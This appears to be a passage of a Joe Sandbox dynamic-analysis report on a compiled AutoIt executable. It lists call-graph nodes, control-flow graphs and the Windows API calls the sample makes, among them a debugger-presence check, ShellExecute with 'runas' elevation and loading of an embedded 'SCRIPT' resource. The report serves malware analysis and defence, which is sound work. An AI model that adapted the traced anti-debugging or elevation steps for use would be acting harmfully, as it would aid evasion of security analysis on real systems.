103246->103248 103317 6ba4d1 103248->103317 103249 6b3119 __initterm_e 103250 6b2d40 __cinit 67 API calls 103249->103250 103251 6b3138 _doexit __IsNonwritableInCurrentImage 103249->103251 103250->103251 103251->103170 103253 6947ea 103252->103253 103263 694889 103252->103263 103254 694824 IsThemeActive 103253->103254 103320 6b336c 103254->103320 103258 694850 103332 6948fd SystemParametersInfoW SystemParametersInfoW 103258->103332 103260 69485c 103333 693b3a 103260->103333 103262 694864 SystemParametersInfoW 103262->103263 103263->103174 103264->103148 103265->103153 103266->103159 103270->103175 103271->103178 103272->103184 103273->103186 103274->103190 103275->103191 103277 6b87dc 103276->103277 103279 6b8817 103277->103279 103281 6b87fa 103277->103281 103285 6c51f6 103277->103285 103279->103194 103282 6b9de6 TlsSetValue 103279->103282 103281->103277 103281->103279 103293 6ba132 Sleep 103281->103293 103282->103198 103283->103202 103284->103199 103286 6c5201 103285->103286 103291 6c521c 103285->103291 103287 6c520d 103286->103287 103286->103291 103294 6b8b28 58 API calls __getptd_noexit 103287->103294 103289 6c522c RtlAllocateHeap 103290 6c5212 103289->103290 103289->103291 103290->103277 103291->103289 103291->103290 103295 6b33a1 DecodePointer 103291->103295 103293->103281 103294->103290 103295->103291 103296->103219 103297->103217 103298->103210 103299->103227 103300->103231 103301->103242 103303 6b8dd1 103302->103303 103308 6b8c59 103303->103308 103307 6b8dec 103307->103245 103309 6b8c73 _memset __call_reportfault 103308->103309 103310 6b8c93 IsDebuggerPresent 103309->103310 103316 6ba155 SetUnhandledExceptionFilter UnhandledExceptionFilter 103310->103316 103312 6bc5f6 __write_nolock 6 API calls 103314 6b8d7a 103312->103314 103313 6b8d57 __call_reportfault 103313->103312 103315 6ba140 GetCurrentProcess TerminateProcess 103314->103315 103315->103307 103316->103313 103318 6ba4d4 EncodePointer 103317->103318 103318->103318 103319 6ba4ee 103318->103319 103319->103249 103321 6b9c0b __lock 58 API calls 103320->103321 103322 6b3377 DecodePointer EncodePointer 103321->103322 103385 6b9d75 LeaveCriticalSection 103322->103385 103324 694849 103325 6b33d4 103324->103325 103326 6b33f8 103325->103326 103327 6b33de 103325->103327 103326->103258 103327->103326 103386 6b8b28 58 API calls __getptd_noexit 103327->103386 103329 6b33e8 103387 6b8db6 9 API calls __write 103329->103387 103331 6b33f3 103331->103258 103332->103260 103334 693b47 __write_nolock 103333->103334 103335 697667 59 API calls 103334->103335 103336 693b51 GetCurrentDirectoryW 103335->103336 103388 693766 103336->103388 103338 693b7a IsDebuggerPresent 103339 693b88 103338->103339 103340 6cd272 MessageBoxA 103338->103340 103342 6cd28c 103339->103342 103343 693ba5 103339->103343 103372 693c61 103339->103372 103340->103342 103341 693c68 SetCurrentDirectoryW 103348 693c75 Mailbox 103341->103348 103510 697213 59 API calls Mailbox 103342->103510 103469 697285 103343->103469 103346 6cd29c 103352 6cd2b2 SetCurrentDirectoryW 103346->103352 103348->103262 103352->103348 103372->103341 103385->103324 103386->103329 103387->103331 103389 697667 59 API calls 103388->103389 103390 69377c 103389->103390 103512 693d31 103390->103512 103392 69379a 103393 694706 61 API calls 103392->103393 103394 6937ae 103393->103394 103395 697de1 59 API calls 103394->103395 103396 6937bb 103395->103396 103397 694ddd 136 API calls 103396->103397 103398 6937d4 103397->103398 103399 6937dc Mailbox 103398->103399 103400 6cd173 103398->103400 103403 698047 59 API calls 103399->103403 103554 6f955b 103400->103554 103406 6937ef 103403->103406 103404 6cd192 103405 6b2d55 _free 58 API calls 103404->103405 103408 6cd19f 103405->103408 103526 69928a 103406->103526 103407 694e4a 84 API calls 103407->103404 103410 694e4a 84 API calls 103408->103410 103412 6cd1a8 103410->103412 103416 693ed0 59 API calls 103412->103416 103413 697de1 59 API calls 103414 693808 103413->103414 103415 6984c0 69 API calls 103414->103415 103417 69381a Mailbox 103415->103417 103418 6cd1c3 103416->103418 103419 697de1 59 API calls 103417->103419 103420 693ed0 59 API calls 103418->103420 103421 693840 103419->103421 103422 6cd1df 103420->103422 103423 6984c0 69 API calls 103421->103423 103424 694706 61 API calls 103422->103424 103426 69384f Mailbox 103423->103426 103425 6cd204 103424->103425 103427 693ed0 59 API calls 103425->103427 103429 697667 59 API calls 103426->103429 103428 6cd210 103427->103428 103430 698047 59 API calls 103428->103430 103431 69386d 103429->103431 103432 6cd21e 103430->103432 103529 693ed0 103431->103529 103434 693ed0 59 API calls 103432->103434 103436 6cd22d 103434->103436 103442 698047 59 API calls 103436->103442 103438 693887 103438->103412 103439 693891 103438->103439 103440 6b2efd _W_store_winword 60 API calls 103439->103440 103441 69389c 103440->103441 103441->103418 103443 6938a6 103441->103443 103444 6cd24f 103442->103444 103445 6b2efd _W_store_winword 60 API calls 103443->103445 103446 693ed0 59 API calls 103444->103446 103447 6938b1 103445->103447 103448 6cd25c 103446->103448 103447->103422 103449 6938bb 103447->103449 103448->103448 103450 6b2efd _W_store_winword 60 API calls 103449->103450 103452 6938c6 103450->103452 103451 693907 103451->103436 103453 693914 103451->103453 103452->103436 103452->103451 103454 693ed0 59 API calls 103452->103454 103456 6992ce 59 API calls 103453->103456 103455 6938ea 103454->103455 103457 698047 59 API calls 103455->103457 103458 693924 103456->103458 103459 6938f8 103457->103459 103460 699050 59 API calls 103458->103460 103461 693ed0 59 API calls 103459->103461 103462 693932 103460->103462 103461->103451 103545 698ee0 103462->103545 103464 69928a 59 API calls 103466 69394f 103464->103466 103465 698ee0 60 API calls 103465->103466 103466->103464 103466->103465 103467 693ed0 59 API calls 103466->103467 103468 693995 Mailbox 103466->103468 103467->103466 103468->103338 103470 697292 __write_nolock 103469->103470 103471 6972ab 103470->103471 103472 6cea22 _memset 103470->103472 103473 694750 60 API calls 103471->103473 103474 6cea3e GetOpenFileNameW 103472->103474 103475 6972b4 103473->103475 103476 6cea8d 103474->103476 103594 6b0791 103475->103594 103478 697bcc 59 API calls 103476->103478 103480 6ceaa2 103478->103480 103480->103480 103482 6972c9 103612 69686a 103482->103612 103510->103346 103513 693d3e __write_nolock 103512->103513 103514 697bcc 59 API calls 103513->103514 103519 693ea4 Mailbox 103513->103519 103515 693d70 103514->103515 103516 6979f2 59 API calls 103515->103516 103522 693da6 Mailbox 103515->103522 103516->103515 103517 693e77 103518 697de1 59 API calls 103517->103518 103517->103519 103521 693e98 103518->103521 103519->103392 103520 697de1 59 API calls 103520->103522 103523 693f74 59 API calls 103521->103523 103522->103517 103522->103519 103522->103520 103524 6979f2 59 API calls 103522->103524 103525 693f74 59 API calls 103522->103525 103523->103519 103524->103522 103525->103522 103527 6b0db6 Mailbox 59 API calls 103526->103527 103528 6937fb 103527->103528 103528->103413 103530 693eda 103529->103530 103531 693ef3 103529->103531 103532 698047 59 API calls 103530->103532 103533 697bcc 59 API calls 103531->103533 103534 693879 103532->103534 103533->103534 103535 6b2efd 103534->103535 103536 6b2f09 103535->103536 103537 6b2f7e 103535->103537 103543 6b2f2e 103536->103543 103589 6b8b28 58 API calls __getptd_noexit 103536->103589 103591 6b2f90 60 API calls 3 library calls 103537->103591 103540 6b2f8b 103540->103438 103541 6b2f15 103590 6b8db6 9 API calls __write 103541->103590 103543->103438 103544 6b2f20 103544->103438 103546 6cf17c 103545->103546 103548 698ef7 103545->103548 103546->103548 103592 698bdb 59 API calls Mailbox 103546->103592 103549 698ff8 103548->103549 103550 699040 103548->103550 103553 698fff 103548->103553 103551 6b0db6 Mailbox 59 API calls 103549->103551 103552 699d3c 60 API calls 103550->103552 103551->103553 103552->103553 103553->103466 103555 694ee5 85 API calls 103554->103555 103556 6f95ca 103555->103556 103557 6f9734 96 API calls 103556->103557 103558 6f95dc 103557->103558 103559 694f0b 74 API calls 103558->103559 103585 6cd186 103558->103585 103560 6f95f7 103559->103560 103561 694f0b 74 API calls 103560->103561 103562 6f9607 103561->103562 103563 694f0b 74 API calls 103562->103563 103564 6f9622 103563->103564 103565 694f0b 74 API calls 103564->103565 103566 6f963d 103565->103566 103567 694ee5 85 API calls 103566->103567 103568 6f9654 103567->103568 103569 6b571c __crtCompareStringA_stat 58 API calls 103568->103569 103570 6f965b 103569->103570 103571 6b571c __crtCompareStringA_stat 58 API calls 103570->103571 103572 6f9665 103571->103572 103573 694f0b 74 API calls 103572->103573 103574 6f9679 103573->103574 103575 6f9109 GetSystemTimeAsFileTime 103574->103575 103576 6f968c 103575->103576 103577 6f96b6 103576->103577 103578 6f96a1 103576->103578 103580 6f96bc 103577->103580 103581 6f971b 103577->103581 103579 6b2d55 _free 58 API calls 103578->103579 103582 6f96a7 103579->103582 103593 6f8b06 116 API calls __fcloseall 103580->103593 103584 6b2d55 _free 58 API calls 103581->103584 103586 6b2d55 _free 58 API calls 103582->103586 103584->103585 103585->103404 103585->103407 103586->103585 103587 6f9713 103588 6b2d55 _free 58 API calls 103587->103588 103588->103585 103589->103541 103590->103544 103591->103540 103592->103548 103593->103587 103595 6c1940 __write_nolock 103594->103595 103596 6b079e GetLongPathNameW 103595->103596 103597 697bcc 59 API calls 103596->103597 103598 6972bd 103597->103598 103599 69700b 103598->103599 103600 697667 59 API calls 103599->103600 103601 69701d 103600->103601 103602 694750 60 API calls 103601->103602 103603 697028 103602->103603 103604 6ce885 103603->103604 103605 697033 103603->103605 103610 6ce89f 103604->103610 103652 697908 61 API calls 103604->103652 103606 693f74 59 API calls 103605->103606 103608 69703f 103606->103608 103646 6934c2 103608->103646 103611 697052 Mailbox 103611->103482 103613 694ddd 136 API calls 103612->103613 103614 69688f 103613->103614 103615 6ce031 103614->103615 103616 694ddd 136 API calls 103614->103616 103617 6f955b 122 API calls 103615->103617 103618 6968a3 103616->103618 103619 6ce046 103617->103619 103618->103615 103620 6968ab 103618->103620 103621 6ce04a 103619->103621 103622 6ce067 103619->103622 103624 6ce052 103620->103624 103625 6968b7 103620->103625 103626 694e4a 84 API calls 103621->103626 103623 6b0db6 Mailbox 59 API calls 103622->103623 103645 6ce0ac Mailbox 103623->103645 103752 6f42f8 90 API calls _wprintf 103624->103752 103653 696a8c 103625->103653 103626->103624 103630 6ce060 103630->103622 103631 6ce260 103635 69750f 59 API calls 103635->103645 103639 6ce271 103642 697de1 59 API calls 103642->103645 103645->103631 103645->103635 103645->103639 103645->103642 103746 69735d 103645->103746 103753 6ef73d 59 API calls 2 library calls 103645->103753 103754 6ef65e 61 API calls 2 library calls 103645->103754 103755 6f737f 59 API calls Mailbox 103645->103755 103647 6934d4 103646->103647 103651 6934f3 _memmove 103646->103651 103650 6b0db6 Mailbox 59 API calls 103647->103650 103648 6b0db6 Mailbox 59 API calls 103649 69350a 103648->103649 103649->103611 103650->103651 103651->103648 103652->103604 103654 6ce41e 103653->103654 103655 696ab5 103653->103655 103778 6ef7a1 89 API calls 4 library calls 103654->103778 103762 6957a6 60 API calls Mailbox 103655->103762 103658 6ce431 103659 696ad7 103747 697370 103746->103747 103752->103630 103753->103645 103754->103645 103755->103645 103762->103659 103778->103658 103806 691066 103811 69f76f 103806->103811 103808 69106c 103809 6b2d40 __cinit 67 API calls 103808->103809 103810 691076 103809->103810 103812 69f790 103811->103812 103844 6aff03 103812->103844 103816 69f7d7 103817 697667 59 API calls 103816->103817 103818 69f7e1 103817->103818 103819 697667 59 API calls 103818->103819 103820 69f7eb 103819->103820 103821 697667 59 API calls 103820->103821 103822 69f7f5 103821->103822 103823 697667 59 API calls 103822->103823 103824 69f833 103823->103824 103825 697667 59 API calls 103824->103825 103826 69f8fe 103825->103826 103854 6a5f87 103826->103854 103830 69f930 103831 697667 59 API calls 103830->103831 103832 69f93a 103831->103832 103882 6afd9e 103832->103882 103834 69f981 103835 69f991 GetStdHandle 103834->103835 103836 69f9dd 103835->103836 103837 6d45ab 103835->103837 103838 69f9e5 OleInitialize 103836->103838 103837->103836 103839 6d45b4 103837->103839 103838->103808 103889 6f6b38 64 API calls Mailbox 103839->103889 103841 6d45bb 103890 6f7207 CreateThread 103841->103890 103843 6d45c7 CloseHandle 103843->103838 103891 6affdc 103844->103891 103847 6affdc 59 API calls 103848 6aff45 103847->103848 103849 697667 59 API calls 103848->103849 103850 6aff51 103849->103850 103851 697bcc 59 API calls 103850->103851 103852 69f796 103851->103852 103853 6b0162 6 API calls 103852->103853 103853->103816 103855 697667 59 API calls 103854->103855 103856 6a5f97 103855->103856 103857 697667 59 API calls 103856->103857 103858 6a5f9f 103857->103858 103898 6a5a9d 103858->103898 103861 6a5a9d 59 API calls 103862 6a5faf 103861->103862 103863 697667 59 API calls 103862->103863 103864 6a5fba 103863->103864 103865 6b0db6 Mailbox 59 API calls 103864->103865 103866 69f908 103865->103866 103867 6a60f9 103866->103867 103868 6a6107 103867->103868 103869 697667 59 API calls 103868->103869 103870 6a6112 103869->103870 103871 697667 59 API calls 103870->103871 103872 6a611d 103871->103872 103873 697667 59 API calls 103872->103873 103874 6a6128 103873->103874 103875 697667 59 API calls 103874->103875 103876 6a6133 103875->103876 103877 6a5a9d 59 API calls 103876->103877 103878 6a613e 103877->103878 103879 6b0db6 Mailbox 59 API calls 103878->103879 103880 6a6145 RegisterWindowMessageW 103879->103880 103880->103830 103883 6e576f 103882->103883 103884 6afdae 103882->103884 103901 6f9ae7 60 API calls 103883->103901 103885 6b0db6 Mailbox 59 API calls 103884->103885 103887 6afdb6 103885->103887 103887->103834 103888 6e577a 103889->103841 103890->103843 103902 6f71ed 65 API calls 103890->103902 103892 697667 59 API calls 103891->103892 103893 6affe7 103892->103893 103894 697667 59 API calls 103893->103894 103895 6affef 103894->103895 103896 697667 59 API calls 103895->103896 103897 6aff3b 103896->103897 103897->103847 103899 697667 59 API calls 103898->103899 103900 6a5aa5 103899->103900 103900->103861 103901->103888 103903 691016 103908 694974 103903->103908 103906 6b2d40 __cinit 67 API calls 103907 691025 103906->103907 103909 6b0db6 Mailbox 59 API calls 103908->103909 103910 69497c 103909->103910 103911 69101b 103910->103911 103915 694936 103910->103915 103911->103906 103916 69493f 103915->103916 103917 694951 103915->103917 103918 6b2d40 __cinit 67 API calls 103916->103918 103919 6949a0 103917->103919 103918->103917 103920 697667 59 API calls 103919->103920 103921 6949b8 GetVersionExW 103920->103921 103922 697bcc 59 API calls 103921->103922 103923 6949fb 103922->103923 103924 697d2c 59 API calls 103923->103924 103929 694a28 103923->103929 103925 694a1c 103924->103925 103926 697726 59 API calls 103925->103926 103926->103929 103927 694a93 GetCurrentProcess IsWow64Process 103928 694aac 103927->103928 103931 694b2b GetSystemInfo 103928->103931 103932 694ac2 103928->103932 103929->103927 103930 6cd864 103929->103930 103933 694af8 103931->103933 103943 694b37 103932->103943 103933->103911 103936 694b1f GetSystemInfo 103938 694ae9 103936->103938 103937 694ad4 103939 694b37 2 API calls 103937->103939 103938->103933 103941 694aef FreeLibrary 103938->103941 103940 694adc GetNativeSystemInfo 103939->103940 103940->103938 103941->103933 103944 694ad0 103943->103944 103945 694b40 LoadLibraryA 103943->103945 103944->103936 103944->103937 103945->103944 103946 694b51 GetProcAddress 103945->103946 103946->103944

                                                            Control-flow Graph

                                                            APIs
                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00693B68
                                                            • IsDebuggerPresent.KERNEL32 ref: 00693B7A
                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,007552F8,007552E0,?,?), ref: 00693BEB
                                                              • Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06
                                                              • Part of subcall function 006A092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00693C14,007552F8,?,?,?), ref: 006A096E
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00693C6F
                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00747770,00000010), ref: 006CD281
                                                            • SetCurrentDirectoryW.KERNEL32(?,007552F8,?,?,?), ref: 006CD2B9
                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00744260,007552F8,?,?,?), ref: 006CD33F
                                                            • ShellExecuteW.SHELL32(00000000,?,?), ref: 006CD346
                                                              • Part of subcall function 00693A46: GetSysColorBrush.USER32(0000000F), ref: 00693A50
                                                              • Part of subcall function 00693A46: LoadCursorW.USER32(00000000,00007F00), ref: 00693A5F
                                                              • Part of subcall function 00693A46: LoadIconW.USER32(00000063), ref: 00693A76
                                                              • Part of subcall function 00693A46: LoadIconW.USER32(000000A4), ref: 00693A88
                                                              • Part of subcall function 00693A46: LoadIconW.USER32(000000A2), ref: 00693A9A
                                                              • Part of subcall function 00693A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00693AC0
                                                              • Part of subcall function 00693A46: RegisterClassExW.USER32(?), ref: 00693B16
                                                              • Part of subcall function 006939D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00693A03
                                                              • Part of subcall function 006939D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00693A24
                                                              • Part of subcall function 006939D5: ShowWindow.USER32(00000000,?,?), ref: 00693A38
                                                              • Part of subcall function 006939D5: ShowWindow.USER32(00000000,?,?), ref: 00693A41
                                                              • Part of subcall function 0069434A: _memset.LIBCMT ref: 00694370
                                                              • Part of subcall function 0069434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00694415
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                            • String ID: This is a third-party compiled AutoIt script.$runas$%r
                                                            • API String ID: 529118366-374001893
                                                            • Opcode ID: 3d71c4a1030d92979fe205e4df3be9caa35dad53d76bc6188d69052e725fc934
                                                            • Instruction ID: ec21f179f1e6cbe1fc1e34ecbc4545ae8f39df15a5d1e713dd19ea047f11db48
                                                            • Opcode Fuzzy Hash: 3d71c4a1030d92979fe205e4df3be9caa35dad53d76bc6188d69052e725fc934
                                                            • Instruction Fuzzy Hash: 5A51E5B0908648EEDF01EBB4DC15EFD7B7EBF45701F00806DF411A66A2DAB85646CB29

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1037 6949a0-694a00 call 697667 GetVersionExW call 697bcc 1042 694b0b-694b0d 1037->1042 1043 694a06 1037->1043 1044 6cd767-6cd773 1042->1044 1045 694a09-694a0e 1043->1045 1046 6cd774-6cd778 1044->1046 1047 694b12-694b13 1045->1047 1048 694a14 1045->1048 1050 6cd77a 1046->1050 1051 6cd77b-6cd787 1046->1051 1049 694a15-694a4c call 697d2c call 697726 1047->1049 1048->1049 1059 6cd864-6cd867 1049->1059 1060 694a52-694a53 1049->1060 1050->1051 1051->1046 1053 6cd789-6cd78e 1051->1053 1053->1045 1055 6cd794-6cd79b 1053->1055 1055->1044 1057 6cd79d 1055->1057 1061 6cd7a2-6cd7a5 1057->1061 1062 6cd869 1059->1062 1063 6cd880-6cd884 1059->1063 1060->1061 1064 694a59-694a64 1060->1064 1065 6cd7ab-6cd7c9 1061->1065 1066 694a93-694aaa GetCurrentProcess IsWow64Process 1061->1066 1067 6cd86c 1062->1067 1071 6cd86f-6cd878 1063->1071 1072 6cd886-6cd88f 1063->1072 1068 694a6a-694a6c 1064->1068 1069 6cd7ea-6cd7f0 1064->1069 1065->1066 1070 6cd7cf-6cd7d5 1065->1070 1073 694aac 1066->1073 1074 694aaf-694ac0 1066->1074 1067->1071 1075 6cd805-6cd811 1068->1075 1076 694a72-694a75 1068->1076 1079 6cd7fa-6cd800 1069->1079 1080 6cd7f2-6cd7f5 1069->1080 1077 6cd7df-6cd7e5 1070->1077 1078 6cd7d7-6cd7da 1070->1078 1071->1063 1072->1067 1081 6cd891-6cd894 1072->1081 1073->1074 1082 694b2b-694b35 GetSystemInfo 1074->1082 1083 694ac2-694ad2 call 694b37 1074->1083 1087 6cd81b-6cd821 1075->1087 1088 6cd813-6cd816 1075->1088 1084 694a7b-694a8a 1076->1084 1085 6cd831-6cd834 1076->1085 1077->1066 1078->1066 1079->1066 1080->1066 1081->1071 1086 694af8-694b08 1082->1086 1094 694b1f-694b29 GetSystemInfo 1083->1094 1095 694ad4-694ae1 call 694b37 1083->1095 1090 694a90 1084->1090 1091 6cd826-6cd82c 1084->1091 1085->1066 1093 6cd83a-6cd84f 1085->1093 1087->1066 1088->1066 1090->1066 1091->1066 1096 6cd859-6cd85f 1093->1096 1097 6cd851-6cd854 1093->1097 1098 694ae9-694aed 1094->1098 1102 694b18-694b1d 1095->1102 1103 694ae3-694ae7 GetNativeSystemInfo 1095->1103 1096->1066 1097->1066 1098->1086 1101 694aef-694af2 FreeLibrary 1098->1101 1101->1086 1102->1103 1103->1098
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 006949CD
                                                              • Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06
                                                            • GetCurrentProcess.KERNEL32(?,0071FAEC,00000000,00000000,?), ref: 00694A9A
                                                            • IsWow64Process.KERNEL32(00000000), ref: 00694AA1
                                                            • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00694AE7
                                                            • FreeLibrary.KERNEL32(00000000), ref: 00694AF2
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00694B23
                                                            • GetSystemInfo.KERNEL32(00000000), ref: 00694B2F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                            • String ID:
                                                            • API String ID: 1986165174-0
                                                            • Opcode ID: 2848df990b4a1bbc832df0a3c0d283957da4b1f0666ec34ed710cafb419cca43
                                                            • Instruction ID: 208e94f17bc1ecf9f92153fa4b0d3f35160dd1b8e69ef2b797d249b1e4d0790c
                                                            • Opcode Fuzzy Hash: 2848df990b4a1bbc832df0a3c0d283957da4b1f0666ec34ed710cafb419cca43
                                                            • Instruction Fuzzy Hash: F591E83198A7C0DECB31CB688450AEABFFAAF2A300B44496DD0C793B45D635A509D76D

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1104 694e89-694ea1 CreateStreamOnHGlobal 1105 694ec1-694ec6 1104->1105 1106 694ea3-694eba FindResourceExW 1104->1106 1107 694ec0 1106->1107 1108 6cd933-6cd942 LoadResource 1106->1108 1107->1105 1108->1107 1109 6cd948-6cd956 SizeofResource 1108->1109 1109->1107 1110 6cd95c-6cd967 LockResource 1109->1110 1110->1107 1111 6cd96d-6cd975 1110->1111 1112 6cd979-6cd98b 1111->1112 1112->1107
                                                            APIs
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00694D8E,?,?,00000000,00000000), ref: 00694E99
                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00694D8E,?,?,00000000,00000000), ref: 00694EB0
                                                            • LoadResource.KERNEL32(?,00000000,?,?,00694D8E,?,?,00000000,00000000,?,?,?,?,?,?,00694E2F), ref: 006CD937
                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00694D8E,?,?,00000000,00000000,?,?,?,?,?,?,00694E2F), ref: 006CD94C
                                                            • LockResource.KERNEL32(00694D8E,?,?,00694D8E,?,?,00000000,00000000,?,?,?,?,?,?,00694E2F,00000000), ref: 006CD95F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: SCRIPT
                                                            • API String ID: 3051347437-3967369404
                                                            • Opcode ID: 0abf742fe09237f6c903ac0c3da5d1a10aab85d8ca24e79900e9f79ba41a9697
                                                            • Instruction ID: f2b25c0e8242e4c12a8b4e6bab565aa1b39a04dcd7bf9bd8fc76e1e2e21dcc8f
                                                            • Opcode Fuzzy Hash: 0abf742fe09237f6c903ac0c3da5d1a10aab85d8ca24e79900e9f79ba41a9697
                                                            • Instruction Fuzzy Hash: 73114C75240700ABDB218B69EC48FAB7BBEFBC5B11F108268F40586690DB75EC018660
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: BuffCharUpper
                                                            • String ID: pbu$%r
                                                            • API String ID: 3964851224-3538053991
                                                            • Opcode ID: 74d57005d3385245b49bc680db0717dee6e7681f1d8607f38bf5dad41b060ffe
                                                            • Instruction ID: 859622c8fc1a6883ab8bc97448684e19d210cb3ec83de299579e0988fc0c7c20
                                                            • Opcode Fuzzy Hash: 74d57005d3385245b49bc680db0717dee6e7681f1d8607f38bf5dad41b060ffe
                                                            • Instruction Fuzzy Hash: F3926D70A083419FEB60DF14C480B6AB7E6BF86304F14896DE88A9B351DB75EC45CF96
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Ddu$Ddu$Ddu$Ddu$Variable must be of type 'Object'.
                                                            • API String ID: 0-808039955
                                                            • Opcode ID: 53b85c441f12da2f46200cdd8d6660617eed9839c53aeb912324d9ab41ed7b85
                                                            • Instruction ID: 582e61b61a9d882f969e7c59618d5249e3b4b903f5ef4af7d03f1c4263b8d471
                                                            • Opcode Fuzzy Hash: 53b85c441f12da2f46200cdd8d6660617eed9839c53aeb912324d9ab41ed7b85
                                                            • Instruction Fuzzy Hash: FEA26A74A00215CFCF24CF98C480AAAB7BBFF58314F64846AE905AB751D776ED42CB91
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,006CE398), ref: 006F446A
                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 006F447B
                                                            • FindClose.KERNEL32(00000000), ref: 006F448B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
